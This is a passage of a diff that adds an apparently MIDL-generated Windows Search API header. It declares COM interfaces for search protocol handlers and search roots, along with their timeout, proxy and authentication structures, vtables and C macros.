+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISearchProtocolThreadContext_ThreadInit(This)	\
+    ( (This)->lpVtbl -> ThreadInit(This) ) 
+
+#define ISearchProtocolThreadContext_ThreadShutdown(This)	\
+    ( (This)->lpVtbl -> ThreadShutdown(This) ) 
+
+#define ISearchProtocolThreadContext_ThreadIdle(This,dwTimeElaspedSinceLastCallInMS)	\
+    ( (This)->lpVtbl -> ThreadIdle(This,dwTimeElaspedSinceLastCallInMS) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ISearchProtocolThreadContext_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_searchapi_0000_0006 */
+/* [local] */ 
+
+#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
+#pragma endregion
+#include <winapifamily.h>
+#pragma region Desktop Family
+#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)
+
+
+#pragma pack(8)
+typedef struct _TIMEOUT_INFO
+    {
+    DWORD dwSize;
+    DWORD dwConnectTimeout;
+    DWORD dwDataTimeout;
+    } 	TIMEOUT_INFO;
+
+typedef 
+enum _PROXY_ACCESS
+    {
+        PROXY_ACCESS_PRECONFIG	= 0,
+        PROXY_ACCESS_DIRECT	= ( PROXY_ACCESS_PRECONFIG + 1 ) ,
+        PROXY_ACCESS_PROXY	= ( PROXY_ACCESS_DIRECT + 1 ) 
+    } 	PROXY_ACCESS;
+
+typedef struct _PROXY_INFO
+    {
+    DWORD dwSize;
+    LPCWSTR pcwszUserAgent;
+    PROXY_ACCESS paUseProxy;
+    BOOL fLocalBypass;
+    DWORD dwPortNumber;
+    LPCWSTR pcwszProxyName;
+    LPCWSTR pcwszBypassList;
+    } 	PROXY_INFO;
+
+typedef 
+enum _AUTH_TYPE
+    {
+        eAUTH_TYPE_ANONYMOUS	= 0,
+        eAUTH_TYPE_NTLM	= ( eAUTH_TYPE_ANONYMOUS + 1 ) ,
+        eAUTH_TYPE_BASIC	= ( eAUTH_TYPE_NTLM + 1 ) 
+    } 	AUTH_TYPE;
+
+typedef struct _AUTHENTICATION_INFO
+    {
+    DWORD dwSize;
+    AUTH_TYPE atAuthenticationType;
+    LPCWSTR pcwszUser;
+    LPCWSTR pcwszPassword;
+    } 	AUTHENTICATION_INFO;
+
+typedef struct _INCREMENTAL_ACCESS_INFO
+    {
+    DWORD dwSize;
+    FILETIME ftLastModifiedTime;
+    } 	INCREMENTAL_ACCESS_INFO;
+
+typedef struct _ITEM_INFO
+    {
+    DWORD dwSize;
+    LPCWSTR pcwszFromEMail;
+    LPCWSTR pcwszApplicationName;
+    LPCWSTR pcwszCatalogName;
+    LPCWSTR pcwszContentClass;
+    } 	ITEM_INFO;
+
+
+
+
+
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0006_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0006_v0_0_s_ifspec;
+
+#ifndef __ISearchProtocol_INTERFACE_DEFINED__
+#define __ISearchProtocol_INTERFACE_DEFINED__
+
+/* interface ISearchProtocol */
+/* [unique][helpstring][uuid][local][object] */ 
+
+
+EXTERN_C const IID IID_ISearchProtocol;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("c73106ba-ac80-11d1-8df3-00c04fb6ef4f")
+    ISearchProtocol : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE Init( 
+            /* [in] */ TIMEOUT_INFO *pTimeoutInfo,
+            /* [in] */ IProtocolHandlerSite *pProtocolHandlerSite,
+            /* [in] */ PROXY_INFO *pProxyInfo) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE CreateAccessor( 
+            /* [in] */ LPCWSTR pcwszURL,
+            /* [in] */ AUTHENTICATION_INFO *pAuthenticationInfo,
+            /* [in] */ INCREMENTAL_ACCESS_INFO *pIncrementalAccessInfo,
+            /* [in] */ ITEM_INFO *pItemInfo,
+            /* [out] */ IUrlAccessor **ppAccessor) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE CloseAccessor( 
+            /* [in] */ IUrlAccessor *pAccessor) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE ShutDown( void) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISearchProtocolVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            ISearchProtocol * This,
+            /* [in] */ REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            ISearchProtocol * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            ISearchProtocol * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *Init )( 
+            ISearchProtocol * This,
+            /* [in] */ TIMEOUT_INFO *pTimeoutInfo,
+            /* [in] */ IProtocolHandlerSite *pProtocolHandlerSite,
+            /* [in] */ PROXY_INFO *pProxyInfo);
+        
+        HRESULT ( STDMETHODCALLTYPE *CreateAccessor )( 
+            ISearchProtocol * This,
+            /* [in] */ LPCWSTR pcwszURL,
+            /* [in] */ AUTHENTICATION_INFO *pAuthenticationInfo,
+            /* [in] */ INCREMENTAL_ACCESS_INFO *pIncrementalAccessInfo,
+            /* [in] */ ITEM_INFO *pItemInfo,
+            /* [out] */ IUrlAccessor **ppAccessor);
+        
+        HRESULT ( STDMETHODCALLTYPE *CloseAccessor )( 
+            ISearchProtocol * This,
+            /* [in] */ IUrlAccessor *pAccessor);
+        
+        HRESULT ( STDMETHODCALLTYPE *ShutDown )( 
+            ISearchProtocol * This);
+        
+        END_INTERFACE
+    } ISearchProtocolVtbl;
+
+    interface ISearchProtocol
+    {
+        CONST_VTBL struct ISearchProtocolVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISearchProtocol_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISearchProtocol_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISearchProtocol_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISearchProtocol_Init(This,pTimeoutInfo,pProtocolHandlerSite,pProxyInfo)	\
+    ( (This)->lpVtbl -> Init(This,pTimeoutInfo,pProtocolHandlerSite,pProxyInfo) ) 
+
+#define ISearchProtocol_CreateAccessor(This,pcwszURL,pAuthenticationInfo,pIncrementalAccessInfo,pItemInfo,ppAccessor)	\
+    ( (This)->lpVtbl -> CreateAccessor(This,pcwszURL,pAuthenticationInfo,pIncrementalAccessInfo,pItemInfo,ppAccessor) ) 
+
+#define ISearchProtocol_CloseAccessor(This,pAccessor)	\
+    ( (This)->lpVtbl -> CloseAccessor(This,pAccessor) ) 
+
+#define ISearchProtocol_ShutDown(This)	\
+    ( (This)->lpVtbl -> ShutDown(This) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ISearchProtocol_INTERFACE_DEFINED__ */
+
+
+#ifndef __ISearchProtocol2_INTERFACE_DEFINED__
+#define __ISearchProtocol2_INTERFACE_DEFINED__
+
+/* interface ISearchProtocol2 */
+/* [unique][helpstring][uuid][local][object] */ 
+
+
+EXTERN_C const IID IID_ISearchProtocol2;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("7789F0B2-B5B2-4722-8B65-5DBD150697A9")
+    ISearchProtocol2 : public ISearchProtocol
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE CreateAccessorEx( 
+            /* [in] */ LPCWSTR pcwszURL,
+            /* [in] */ AUTHENTICATION_INFO *pAuthenticationInfo,
+            /* [in] */ INCREMENTAL_ACCESS_INFO *pIncrementalAccessInfo,
+            /* [in] */ ITEM_INFO *pItemInfo,
+            /* [in] */ const BLOB *pUserData,
+            /* [out] */ IUrlAccessor **ppAccessor) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISearchProtocol2Vtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            ISearchProtocol2 * This,
+            /* [in] */ REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            ISearchProtocol2 * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            ISearchProtocol2 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *Init )( 
+            ISearchProtocol2 * This,
+            /* [in] */ TIMEOUT_INFO *pTimeoutInfo,
+            /* [in] */ IProtocolHandlerSite *pProtocolHandlerSite,
+            /* [in] */ PROXY_INFO *pProxyInfo);
+        
+        HRESULT ( STDMETHODCALLTYPE *CreateAccessor )( 
+            ISearchProtocol2 * This,
+            /* [in] */ LPCWSTR pcwszURL,
+            /* [in] */ AUTHENTICATION_INFO *pAuthenticationInfo,
+            /* [in] */ INCREMENTAL_ACCESS_INFO *pIncrementalAccessInfo,
+            /* [in] */ ITEM_INFO *pItemInfo,
+            /* [out] */ IUrlAccessor **ppAccessor);
+        
+        HRESULT ( STDMETHODCALLTYPE *CloseAccessor )( 
+            ISearchProtocol2 * This,
+            /* [in] */ IUrlAccessor *pAccessor);
+        
+        HRESULT ( STDMETHODCALLTYPE *ShutDown )( 
+            ISearchProtocol2 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *CreateAccessorEx )( 
+            ISearchProtocol2 * This,
+            /* [in] */ LPCWSTR pcwszURL,
+            /* [in] */ AUTHENTICATION_INFO *pAuthenticationInfo,
+            /* [in] */ INCREMENTAL_ACCESS_INFO *pIncrementalAccessInfo,
+            /* [in] */ ITEM_INFO *pItemInfo,
+            /* [in] */ const BLOB *pUserData,
+            /* [out] */ IUrlAccessor **ppAccessor);
+        
+        END_INTERFACE
+    } ISearchProtocol2Vtbl;
+
+    interface ISearchProtocol2
+    {
+        CONST_VTBL struct ISearchProtocol2Vtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISearchProtocol2_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISearchProtocol2_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISearchProtocol2_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISearchProtocol2_Init(This,pTimeoutInfo,pProtocolHandlerSite,pProxyInfo)	\
+    ( (This)->lpVtbl -> Init(This,pTimeoutInfo,pProtocolHandlerSite,pProxyInfo) ) 
+
+#define ISearchProtocol2_CreateAccessor(This,pcwszURL,pAuthenticationInfo,pIncrementalAccessInfo,pItemInfo,ppAccessor)	\
+    ( (This)->lpVtbl -> CreateAccessor(This,pcwszURL,pAuthenticationInfo,pIncrementalAccessInfo,pItemInfo,ppAccessor) ) 
+
+#define ISearchProtocol2_CloseAccessor(This,pAccessor)	\
+    ( (This)->lpVtbl -> CloseAccessor(This,pAccessor) ) 
+
+#define ISearchProtocol2_ShutDown(This)	\
+    ( (This)->lpVtbl -> ShutDown(This) ) 
+
+
+#define ISearchProtocol2_CreateAccessorEx(This,pcwszURL,pAuthenticationInfo,pIncrementalAccessInfo,pItemInfo,pUserData,ppAccessor)	\
+    ( (This)->lpVtbl -> CreateAccessorEx(This,pcwszURL,pAuthenticationInfo,pIncrementalAccessInfo,pItemInfo,pUserData,ppAccessor) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ISearchProtocol2_INTERFACE_DEFINED__ */
+
+
+#ifndef __IProtocolHandlerSite_INTERFACE_DEFINED__
+#define __IProtocolHandlerSite_INTERFACE_DEFINED__
+
+/* interface IProtocolHandlerSite */
+/* [unique][helpstring][uuid][local][object] */ 
+
+
+EXTERN_C const IID IID_IProtocolHandlerSite;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("0b63e385-9ccc-11d0-bcdb-00805fccce04")
+    IProtocolHandlerSite : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE GetFilter( 
+            /* [in] */ CLSID *pclsidObj,
+            /* [in] */ LPCWSTR pcwszContentType,
+            /* [in] */ LPCWSTR pcwszExtension,
+            /* [out] */ IFilter **ppFilter) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IProtocolHandlerSiteVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            IProtocolHandlerSite * This,
+            /* [in] */ REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            IProtocolHandlerSite * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            IProtocolHandlerSite * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetFilter )( 
+            IProtocolHandlerSite * This,
+            /* [in] */ CLSID *pclsidObj,
+            /* [in] */ LPCWSTR pcwszContentType,
+            /* [in] */ LPCWSTR pcwszExtension,
+            /* [out] */ IFilter **ppFilter);
+        
+        END_INTERFACE
+    } IProtocolHandlerSiteVtbl;
+
+    interface IProtocolHandlerSite
+    {
+        CONST_VTBL struct IProtocolHandlerSiteVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IProtocolHandlerSite_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IProtocolHandlerSite_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IProtocolHandlerSite_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IProtocolHandlerSite_GetFilter(This,pclsidObj,pcwszContentType,pcwszExtension,ppFilter)	\
+    ( (This)->lpVtbl -> GetFilter(This,pclsidObj,pcwszContentType,pcwszExtension,ppFilter) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IProtocolHandlerSite_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_searchapi_0000_0009 */
+/* [local] */ 
+
+
+#pragma pack()
+#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
+#pragma endregion
+#include <winapifamily.h>
+#pragma region Desktop Family
+#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)
+
+
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0009_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0009_v0_0_s_ifspec;
+
+#ifndef __ISearchRoot_INTERFACE_DEFINED__
+#define __ISearchRoot_INTERFACE_DEFINED__
+
+/* interface ISearchRoot */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_ISearchRoot;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("04C18CCF-1F57-4CBD-88CC-3900F5195CE3")
+    ISearchRoot : public IUnknown
+    {
+    public:
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Schedule( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszTaskArg) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Schedule( 
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszTaskArg) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_RootURL( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RootURL( 
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszURL) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_IsHierarchical( 
+            /* [in] */ BOOL fIsHierarchical) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IsHierarchical( 
+            /* [retval][out] */ __RPC__out BOOL *pfIsHierarchical) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ProvidesNotifications( 
+            /* [in] */ BOOL fProvidesNotifications) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ProvidesNotifications( 
+            /* [retval][out] */ __RPC__out BOOL *pfProvidesNotifications) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_UseNotificationsOnly( 
+            /* [in] */ BOOL fUseNotificationsOnly) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_UseNotificationsOnly( 
+            /* [retval][out] */ __RPC__out BOOL *pfUseNotificationsOnly) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_EnumerationDepth( 
+            /* [in] */ DWORD dwDepth) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EnumerationDepth( 
+            /* [retval][out] */ __RPC__out DWORD *pdwDepth) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_HostDepth( 
+            /* [in] */ DWORD dwDepth) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_HostDepth( 
+            /* [retval][out] */ __RPC__out DWORD *pdwDepth) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_FollowDirectories( 
+            /* [in] */ BOOL fFollowDirectories) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_FollowDirectories( 
+            /* [retval][out] */ __RPC__out BOOL *pfFollowDirectories) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_AuthenticationType( 
+            /* [in] */ AUTH_TYPE authType) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AuthenticationType( 
+            /* [retval][out] */ __RPC__out AUTH_TYPE *pAuthType) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_User( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszUser) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_User( 
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszUser) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Password( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszPassword) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Password( 
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszPassword) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISearchRootVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ISearchRoot * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ISearchRoot * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ISearchRoot * This);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Schedule )( 
+            __RPC__in ISearchRoot * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszTaskArg);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Schedule )( 
+            __RPC__in ISearchRoot * This,
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszTaskArg);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RootURL )( 
+            __RPC__in ISearchRoot * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RootURL )( 
+            __RPC__in ISearchRoot * This,
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszURL);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_IsHierarchical )( 
+            __RPC__in ISearchRoot * This,
+            /* [in] */ BOOL fIsHierarchical);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IsHierarchical )( 
+            __RPC__in ISearchRoot * This,
+            /* [retval][out] */ __RPC__out BOOL *pfIsHierarchical);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ProvidesNotifications )( 
+            __RPC__in ISearchRoot * This,
+            /* [in] */ BOOL fProvidesNotifications);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProvidesNotifications )( 
+            __RPC__in ISearchRoot * This,
+            /* [retval][out] */ __RPC__out BOOL *pfProvidesNotifications);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UseNotificationsOnly )( 
+            __RPC__in ISearchRoot * This,
+            /* [in] */ BOOL fUseNotificationsOnly);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UseNotificationsOnly )( 
+            __RPC__in ISearchRoot * This,
+            /* [retval][out] */ __RPC__out BOOL *pfUseNotificationsOnly);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_EnumerationDepth )( 
+            __RPC__in ISearchRoot * This,
+            /* [in] */ DWORD dwDepth);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnumerationDepth )( 
+            __RPC__in ISearchRoot * This,
+            /* [retval][out] */ __RPC__out DWORD *pdwDepth);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_HostDepth )( 
+            __RPC__in ISearchRoot * This,
+            /* [in] */ DWORD dwDepth);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_HostDepth )( 
+            __RPC__in ISearchRoot * This,
+            /* [retval][out] */ __RPC__out DWORD *pdwDepth);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_FollowDirectories )( 
+            __RPC__in ISearchRoot * This,
+            /* [in] */ BOOL fFollowDirectories);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_FollowDirectories )( 
+            __RPC__in ISearchRoot * This,
+            /* [retval][out] */ __RPC__out BOOL *pfFollowDirectories);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AuthenticationType )( 
+            __RPC__in ISearchRoot * This,
+            /* [in] */ AUTH_TYPE authType);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AuthenticationType )( 
+            __RPC__in ISearchRoot * This,
+            /* [retval][out] */ __RPC__out AUTH_TYPE *pAuthType);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_User )( 
+            __RPC__in ISearchRoot * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszUser);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_User )( 
+            __RPC__in ISearchRoot * This,
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszUser);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Password )( 
+            __RPC__in ISearchRoot * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszPassword);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Password )( 
+            __RPC__in ISearchRoot * This,
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszPassword);
+        
+        END_INTERFACE
+    } ISearchRootVtbl;
+
+    interface ISearchRoot
+    {
+        CONST_VTBL struct ISearchRootVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISearchRoot_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISearchRoot_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISearchRoot_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISearchRoot_put_Schedule(This,pszTaskArg)	\
+    ( (This)->lpVtbl -> put_Schedule(This,pszTaskArg) ) 
+
+#define ISearchRoot_get_Schedule(This,ppszTaskArg)	\
+    ( (This)->lpVtbl -> get_Schedule(This,ppszTaskArg) ) 
+
+#define ISearchRoot_put_RootURL(This,pszURL)	\
+    ( (This)->lpVtbl -> put_RootURL(This,pszURL) ) 
+
+#define ISearchRoot_get_RootURL(This,ppszURL)	\
+    ( (This)->lpVtbl -> get_RootURL(This,ppszURL) ) 
+
+#define ISearchRoot_put_IsHierarchical(This,fIsHierarchical)	\
+    ( (This)->lpVtbl -> put_IsHierarchical(This,fIsHierarchical) ) 
+
+#define ISearchRoot_get_IsHierarchical(This,pfIsHierarchical)	\
+    ( (This)->lpVtbl -> get_IsHierarchical(This,pfIsHierarchical) ) 
+
+#define ISearchRoot_put_ProvidesNotifications(This,fProvidesNotifications)	\
+    ( (This)->lpVtbl -> put_ProvidesNotifications(This,fProvidesNotifications) ) 
+
+#define ISearchRoot_get_ProvidesNotifications(This,pfProvidesNotifications)	\
+    ( (This)->lpVtbl -> get_ProvidesNotifications(This,pfProvidesNotifications) ) 
+
+#define ISearchRoot_put_UseNotificationsOnly(This,fUseNotificationsOnly)	\
+    ( (This)->lpVtbl -> put_UseNotificationsOnly(This,fUseNotificationsOnly) ) 
+
+#define ISearchRoot_get_UseNotificationsOnly(This,pfUseNotificationsOnly)	\
+    ( (This)->lpVtbl -> get_UseNotificationsOnly(This,pfUseNotificationsOnly) ) 
+
+#define ISearchRoot_put_EnumerationDepth(This,dwDepth)	\
+    ( (This)->lpVtbl -> put_EnumerationDepth(This,dwDepth) ) 
+
+#define ISearchRoot_get_EnumerationDepth(This,pdwDepth)	\
+    ( (This)->lpVtbl -> get_EnumerationDepth(This,pdwDepth) ) 
+
+#define ISearchRoot_put_HostDepth(This,dwDepth)	\
+    ( (This)->lpVtbl -> put_HostDepth(This,dwDepth) ) 
+
+#define ISearchRoot_get_HostDepth(This,pdwDepth)	\
+    ( (This)->lpVtbl -> get_HostDepth(This,pdwDepth) ) 
+
+#define ISearchRoot_put_FollowDirectories(This,fFollowDirectories)	\
+    ( (This)->lpVtbl -> put_FollowDirectories(This,fFollowDirectories) ) 
+
+#define ISearchRoot_get_FollowDirectories(This,pfFollowDirectories)	\
+    ( (This)->lpVtbl -> get_FollowDirectories(This,pfFollowDirectories) ) 
+
+#define ISearchRoot_put_AuthenticationType(This,authType)	\
+    ( (This)->lpVtbl -> put_AuthenticationType(This,authType) ) 
+
+#define ISearchRoot_get_AuthenticationType(This,pAuthType)	\
+    ( (This)->lpVtbl -> get_AuthenticationType(This,pAuthType) ) 
+
+#define ISearchRoot_put_User(This,pszUser)	\
+    ( (This)->lpVtbl -> put_User(This,pszUser) ) 
+
+#define ISearchRoot_get_User(This,ppszUser)	\
+    ( (This)->lpVtbl -> get_User(This,ppszUser) ) 
+
+#define ISearchRoot_put_Password(This,pszPassword)	\
+    ( (This)->lpVtbl -> put_Password(This,pszPassword) ) 
+
+#define ISearchRoot_get_Password(This,ppszPassword)	\
+    ( (This)->lpVtbl -> get_Password(This,ppszPassword) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ISearchRoot_INTERFACE_DEFINED__ */
+
+
+#ifndef __IEnumSearchRoots_INTERFACE_DEFINED__
+#define __IEnumSearchRoots_INTERFACE_DEFINED__
+
+/* interface IEnumSearchRoots */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_IEnumSearchRoots;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("AB310581-AC80-11D1-8DF3-00C04FB6EF52")
+    IEnumSearchRoots : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE Next( 
+            /* [in] */ ULONG celt,
+            /* [size_is][out] */ __RPC__out_ecount_full(celt) ISearchRoot **rgelt,
+            /* [unique][out][in] */ __RPC__inout_opt ULONG *pceltFetched) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE Skip( 
+            /* [in] */ ULONG celt) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE Reset( void) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE Clone( 
+            /* [retval][out] */ __RPC__deref_out_opt IEnumSearchRoots **ppenum) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IEnumSearchRootsVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in IEnumSearchRoots * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in IEnumSearchRoots * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in IEnumSearchRoots * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *Next )( 
+            __RPC__in IEnumSearchRoots * This,
+            /* [in] */ ULONG celt,
+            /* [size_is][out] */ __RPC__out_ecount_full(celt) ISearchRoot **rgelt,
+            /* [unique][out][in] */ __RPC__inout_opt ULONG *pceltFetched);
+        
+        HRESULT ( STDMETHODCALLTYPE *Skip )( 
+            __RPC__in IEnumSearchRoots * This,
+            /* [in] */ ULONG celt);
+        
